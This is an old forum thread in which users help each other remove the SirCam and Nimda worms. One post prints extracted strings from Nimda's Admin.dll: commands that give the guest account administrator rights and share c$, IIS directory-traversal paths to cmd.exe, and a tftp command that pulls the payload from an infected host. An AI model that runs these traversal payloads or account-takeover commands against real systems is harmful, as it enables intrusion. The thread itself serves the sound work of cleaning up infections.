Recently my entire home network came down with this virus, and having been one to ride the wind without a Anti-virus program I have never felt the need in nine years. Now I am running an Anti-virus. This little culprit is a nasty one it infects and spreads it's way across your computer. Not only that but it takes over your filetype for .EXE files making it run them by using SirC32.EXE. What follows is the steps to take to rid yourself of this virus. I have to thank a very close and personal friend without his patience I would have never discovered a work around the exe issue. In addition I need to thank Shadow and Skip as well for their prompt replies and help they have offered.

First thing you are going to need to do is download an anti-virus program because if you are reading this you were probably like me and did not have one. Next thing is to install it, I chose Norton because McAffee has been more than a fair share of problems as of late. It's really up to you what to pick. Run all the option's i.e. Scan at startup/etc... make sure to run the updates and get the latest definition's.

Now follow the next set of instruction's for once you have either found and repaired or quarentined and deleted you will need to restore the filetype association for EXE, for as you may have noticed EXE filetype is the only association you can not edit.


Here is the work around guys so if you happen to get it this is what you have to do. Again because you cannot reassign the EXE to anything this is the only filetype that cannot be edited. This is only applied to win9x/Me type systems.

Open an MS-DOS window, Make sure you are in the C:\Windows dir

Type at the command prompt,

Copy regedit.exe regedit.com (since it is impossible to run executables)

Now type regedit, your regedit window should open, do a find for the file SirC32

It should find it in exefile/support/etc....

They tag should read default and be referenced to SirC32.exe (Something such as "C:\recycled\SirC32.EXE") Double click the tag on the right that states Default and change it to the following.

"%1" %*

Then click exit and you should once again be able to run exe's =)

After doing this delete your newly made regedit.com file =)

Hope this helps! One more thing you made need is the following, SirC likes to infect your C:\Windows\rundll32.exe File, no matter what you do it seemingly is impossible to repair the file, so make sure you have a friend or confident with a "CLEAN" Rundll32.exe file and place it into your Window dir, reboot, and all should be well.

J

Many Thanks - has been noted and printed off, and a clean Rundll32.exe burned on a CD just in case.......

I would like to bags first in line to torture the idiots who write these viruses........

Always have anti-virus software!

Even if you can't afford one, go to www.antivirus.com and use the FREE, web-based scanner from Trend (I use the home version myself and it's great).

Dont forget that If you use Windows ME to empty the system restore folder as well as Viruses can back up on this utility

Trend dominates the Anti-virus market IMO. I use Scanmail for Exchange, Serverprotect for the servers and Officescan Corporate for the clients in my network. Officescan is so sweet for a LAN, it automatically removes any other scanner installed, saving you a step. It's installation can be done through web providing you run a web server. Every setting within the clients is managed centrally, the program cant be removed or unloaded by the end users. You can invoke a system wide scan of all PC's that the user can do nothing about. The control server checks for new patterns and engine updates etc. every hour and if it does find one it is automatically pushed to all clients. You can also roll back to a previous pattern if necessary. All admin is web based and its full of reporting features. Did I mention I like it? :)

Originally posted by reddeathdrinker

I would like to bags first in line to torture the idiots who write these viruses........

I'd just bludgeon them to death w/ their own keyboards. That'd teach em! Kinda poetic-justice like.

More Information on the virus

The worm sends E-mail to the following mail servers:
========================================

omega.serpro.gov.br (161.148.173.118)
server1.sans.org (167.216.133.33 )
smtp.china.com (61.135.144.88)
perninha.conectiva.com.br (200.250.58.156)
phuck.nether.net (204.42.254.5)
mx.ideal.ru (212.69.101.252)
tarkin.fdt.net (209.212.128.45)

From w1re p4ir: Admin.dll (strings ./Admin.dll)
========================================

When running strings against Admin.dll, here is what has been concluded.
I'm sure some of this might be totally off but it is what we think it's attempting to do:
First it was noticed it was setting up:
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China

It then shows the mime headers and the content type:
Content-Type: audio/x-wav;
name="readme.exe"

This is obviously part of the readme.eml. Next we see it making some changes or reading of the registry:

[rename]
\wininit.ini
Personal
Software\Microsoft\Windows\CurrentVersion\Explorer \Shell Folders
\*.*
EXPLORER
fsdhqherwqi2001
SYSTEM\CurrentControlSet\Services\lanmanserver\Sha res\Security
share c$=c:\

It also seems to add the user "guest" to the Administrator group.

user guest ""
localgroup Administrators guest /add
localgroup Guests guest /add
user guest /active
open
user guest /add

After this we notice the binary directories and unicode character sets to be used in compromising the other hosts.

/root.exe?/c+
/winnt/system32/cmd.exe?/c+
net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
Admin.dll
c:\Admin.dll
d:\Admin.dll
e:\Admin.dll

This is an interesting part it must be net using to the localmachine(maybe) with the user guest (who is now an administrator) and tftping the Admin.dll and putting it in the current directory and all Drive Roots C:, D: ect.


<html><script language="JavaScript">window.open("readme.eml", null, "resizable=n
o,top=6000,left=6000")</script></html>
/Admin.dll

Here's where it inserts the javascript to open the evil readme.eml mime Buffer overflow.


This im' not too sure of what its trying to do. I imagine it's setting up the email information:
QUIT
Subject:
From: <
DATA
RCPT TO: <
MAIL FROM: <
HELO
aabbcc
-dontrunold
NULL
\readme*.exe
admin.dll
qusery9bnow
-qusery9bnow
\mmc.exe
\riched20.dll
boot
Shell
explorer.exe load.exe -dontrunold
\system.ini
\load.exe

========================================
Here are some of it's content:

<quote>
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters \Interfaces\
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters \Interfaces
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
....
NUL=
[rename]
\wininit.ini
Personal
Software\Microsoft\Windows\CurrentVersion\Explorer \Shell Folders
\*.*
EXPLORER
fsdhqherwqi2001
SYSTEM\CurrentControlSet\Services\lanmanserver\Sha res\Security
share c$=c:\
user guest ""
localgroup Administrators guest /add
localgroup Guests guest /add
user guest /active
open
user guest /add
HideFileExt
ShowSuperHidden
Hidden
Software\Microsoft\Windows\CurrentVersion\Explorer \Advanced
...
software\microsoft\windows nt\currentversion\perflib
/scripts
/MSADC
/scripts/..%255c..
/_vti_bin/..%255c../..%255c../..%255c..
/_mem_bin/..%255c../..%255c../..%255c..
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
/scripts/..%c1%1c..
/scripts/..%c0%2f..
/scripts/..%c0%af..
/scripts/..%c1%9c..
/scripts/..%%35%63..
/scripts/..%%35c..
/scripts/..%25%35%63..
/scripts/..%252f..
/root.exe?/c+
/winnt/system32/cmd.exe?/c+
net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
Admin.dll
c:\Admin.dll
d:\Admin.dll
e:\Admin.dll
html script language="JavaScript" window.open("readme.eml", null,
"resizable=no,top=6000,left=6000") script html
/Admin.dll
GET %s HTTP/1.0
Host: www
Connnection: close
readme
main
index
default
html
.asp
.htm
\readme.eml
.exe
winzip32.exe
riched20.dll
.nws
.eml
.doc
.exe
...
SYSTEM\CurrentControlSet\Services\lanmanserver\Sha res
Cache
Software\Microsoft\Windows\CurrentVersion\Explorer \MapMail
QUIT
Subject:
From: <
DATA
RCPT TO: <
MAIL FROM: <
HELO
aabbcc
-dontrunold
NULL
\readme*.exe
admin.dll
qusery9bnow
-qusery9bnow
\mmc.exe
\riched20.dll
boot
Shell
explorer.exe load.exe -dontrunold
\system.ini
\load.exe
....
</quote>

Here's a little something to help rid of SirC32:

Go to http://www.sarc.com/avcenter/FixSirc.com

It's a little executable that searches for and the destroys this annoying worm.

Then you need to extract rundll32.exe from the windows cabs -

"extract <path to cabs> win98_46.cab rundll32.exe <path to where you want it extracted>"

Copy rundll32.exe to c:\windows and overwrite it when prompted.

Reboot and run a virus scan. You should have no SirC32 anymore.

Note: if you're on a network, disconnect each machine so they are standalone. Also, check your autoexec.bat file - if it has ANYTHING relating to Sirc32.exe in it, remove those lines.

The above procedure worked for me on my 10 machine network (I work in an internet / multiplayer games cafe) and now I'm SirC free!

Nice thread guys. How about a little bit on how to tell if you have the virus. There are probably a bunch of us who use virus protection but are a bit nervous anyway.

For instance, I use Norton, update the files every friday, but lately my network has been flaky. Can't tell if it's @home or something else? So, how do you know?

nihili

Check out http://www.symantec.com/avcenter/venc/data/w32.sircam.worm@mm.html for more information on SirC.

Ok, I've had several files like readme.exe and other filenames that it seems to have 'stolen' from other computers and put in .exe form, such as mp3 filenames. But I'm not sure if I'm infected...I've scanned and quarentined several copies, but not sure if I'm completely rid of it. If I try to delete it directly it kills explorer(in win2k, not a big problem).

I can still run games and other exes...I just say that because it sounds as if a symptom of the worm is not being able to run any executables. Is that correct? I might set my systems to both do a full scan, overnight, and cut off full filesharing to any folders(where it seems to enter)

When I found SirC all executeables still ran but a little slower than norm.

To be safe I suggest you get the fix from the link in my post "A little something to help rid or SirC32".

The procedure shown in that post was used on Win98 platform. Not sure if itll work in Win2K...

Suggest you pull the network cable when cleaning each machine just to be safe.

Hope this helps...

it's just another computer virus...if you have latest update from your antivirus software....problem can be solved

remember you dudez in the country of capitalists that if it were not for the talented individuals who write viri then there would be no av ppl eg. snortin norton,mcafee,kapersky,command,trend etc etc,

Mind you viri are a bit mindless but you have admire authors of some of the trojans especially sub7
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"i may not agree with what you say but i will defend your right to say it"--voltaire--

Originally posted by trapper
remember you dudez in the country of capitalists that if it were not for the talented individuals who write viri then there would be no av ppl eg. snortin norton,mcafee,kapersky,command,trend etc etc,

Mind you viri are a bit mindless but you have admire authors of some of the trojans especially sub7
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"i may not agree with what you say but i will defend your right to say it"--voltaire--


I would much rather say that if the 'morons' who write viruses ceased to do so there would be no need for any AV software and the same can be said about Trojan writers.. I do NOT personally believe that anyone who damages other peoples property and effects peoples lives worthy of any kind of admiration.. While I have respect for the skill of someone who understands protocols and programming enough to discover 'system flaws' I do fail to see what is obtained by exploiting these flaws on the average users system. What is so different about trojans such as sub7 for you to consider that they are any less mindless than viruses?... both were created by someone with skill and understanding to create havoc and both are usually used by morons with no more skill or understanding of computer systems than that required to operate ICQ

Microsoft update for outlook 2002 that will help protect you. get it NOW!

http://office.microsoft.com/Downloads/2000/Out2ksec.aspx

Originally posted by Amedeo602
Always have anti-virus software!

Even if you can't afford one, go to www.antivirus.com and use the FREE, web-based scanner from Trend (I use the home version myself and it's great).

**This post has been edited by SpeeDj**
----------------------------------------------------------------------------------------------------------------------

Warez, Crackz, and Copyrighted material

This is to clarify the position of this site regarding Warez information and warez sites, Crackz and information about crackz, and the posting and downloading of copyrighted material.

Overclockers prohibits the promotion of, and reference to, any program or website which contains or distributes Warez, Crackz, and pirated copyrighted material, including but not limited to music and video.

Discussion of Warez, crackz, and pirated copyrighted material is not permitted in this forum. Any offer to provide or request to receive warez, crackz, and bootleg material will be deleted without notice and the offender will be warned. A repeat offense is grounds for permanent dismissal, without recourse, from these forums.

This is a serious issue for this Forum. Allowing discussion of and, by extension condoning the distribution of, said information jeopardizes the very existence of this Forum. As such, it will not be tolerated. For the long-term future of this site, please abide by this rule.

Thanks,

Overclockers.com Forum Management
----------------------------------------------------------------------------------------------------------------------

"FEED THE NEEDY NOT THE GREEDY"

WHO ATE ALL THE PIES??

I've found that this thread is mostly for Sircam, but not Nimda, as the title sez.

As of right now, I have a Nimda infection, and I can't shake it. My Norton doesn't pick up anything during scans (and it is completely updated), and in my log files, I still see things trying to access cmd.exe (the win2000 command prompt) through my scripts folder (I turned scripting off, just in case). Is there any way I can clear this annoying virus off of my box for good, or do I need to format again? I hope not. I just got my system back in order from the last format I did.

There are a number of virus'/worms/trojans that cannot be removed by an anti-virus program alone. Any time you get any virus you should go to one of the anti-virus sites and check the removal instructions. SirCam and Nimda are both ones that require the use of a separate removal tool that you can download. Just make sure you follow exactly the removal instructions to ensure that the malicious code is completely removed from your system.

Wish I would have found this thread last week. I just finished formatting all 5 systems on my lan due to nimda. It was a lot of work but I am 100% sure it is gone. Also I never ran av before but I have one now. Lesson learned the hard way.

Just got thru recovering (hopefully) from a nimda/virus/trojan attack. I am using Inocutel and IE 5,5 has the latest security update. I got hooked to Roadrunner hi-speed a month ago. What do I need for a "firewall"??

Pardon in advance for this rookie question!!

THX;Paul C:

nimba/sircam HOWTO?

1. fdisk your hard drive

2. install linux

3. forever cured!

how did you catch this virus?

Wow, now i can fix my computer instead of formating it... :rolleyes:

I have (used to have) McAFee virus scanner, i upgraded it all the time, and a macro virus jumped into the McAFee file folder and infected everything, i could clean the computer but McAFee wouldn't delete or quaranten itself lol! The program had to much pride in itslef...

If i have a virus on my computer, and i can't fix it without useing the program and deleting manualy... i just say forget it and format my hardrive(s) :D

im glad this was a sticky cause i just got this neat little virus on my network and have some work ahead of me tonight. i also found this (http://securityresponse.symantec.com/avcenter/venc/data/w32.nimda.a@mm.removal.tool.html) which im hoping will be helpful.
thanks for all the tips.

i just got OWNED by this little bugger... and i dont even know how i got it :(

http://zigma.mrwatermonkey.com/virus2.jpg

I was wondering, since UnseenMenace i think said that after you have a virus, empty your windows restore folder.....which folder is it?

thanks

NIMBDA E is very wicked. Just got rid of that little sucker but my system still is not quite right, eventhough I did a repair install of windows xp pro.

For instance... I can no longer use the "fax" print option. Keeps telling me that the device is not connected. Have uninstalled this feature and reinstalled several times with no luck.

Do I or should I need to format and start over???

AVG6 Free It has caught what Norton & Mcafee miss ?

i cought the sucker again!!!! jesus... and there is a file calle readme.exe which does not want to delete. i still have over 300 infected files out of 1377!! need more info on how to remove. :-(

a family member of mine has the virus. I scanned for viruses, but when it found the viruses, if couldn''t take n e action. So i updated norton.....then i scanned again....it didn't find anything. What a pest....every couple hours norton will pop up about 50 times in a row, "VIRUS FOUND!" VIRUS FOUND!"...always delete um but wont go away....nasty little bugger....when we find who makes these darn things....gonna tie em to a telephone pole and poke em with a stick until they die....

No offence but your way isn't the greatest. Get a utility that just runs thru dos and kills all your .eml files - thusly nimda, it will fix all your problems.

I have done your way and well i could tell just from reading it would not have the same effect missing some stuff. TO lazy to write but enjoy :)

i used a program called swnimda. If using xp you got to use taskmanager and select newtask then the patch of it ie c:\swnimda then the drive , ie c:\swnimda c:

Pm if you really need it.

We here at the shop have found that Norton can find some viruses, but it gets disabled, handicapped, can't do anything about it. I installed AVG on a client's computer and it deleted and fixed his over 300 infected files, while Norton was left fluttering in the wind. AVG is better than McAfee, and Norton. You could get it for free, but now, it's a 30 day trial, and then you can purchase a home user. I will, it's worth it. Download it here, www.grisoft.com
Doc

You are my new bestest friend. Thanks for the info.
Too bad that old ladies don't know how to keep viruses off their laptops. :rolleyes:

thx for information

this is probably old new, but if no one has noticed, well nimda is admin backwards... something to ponder

Hmm....

This is interesting. I am away on a business trip now, but when I get home I'm checking.

My Notepad dissappeared. Gone, nothin. I had to grab it off one of the other comps on my home network. Wonder if this SirC is the culprit.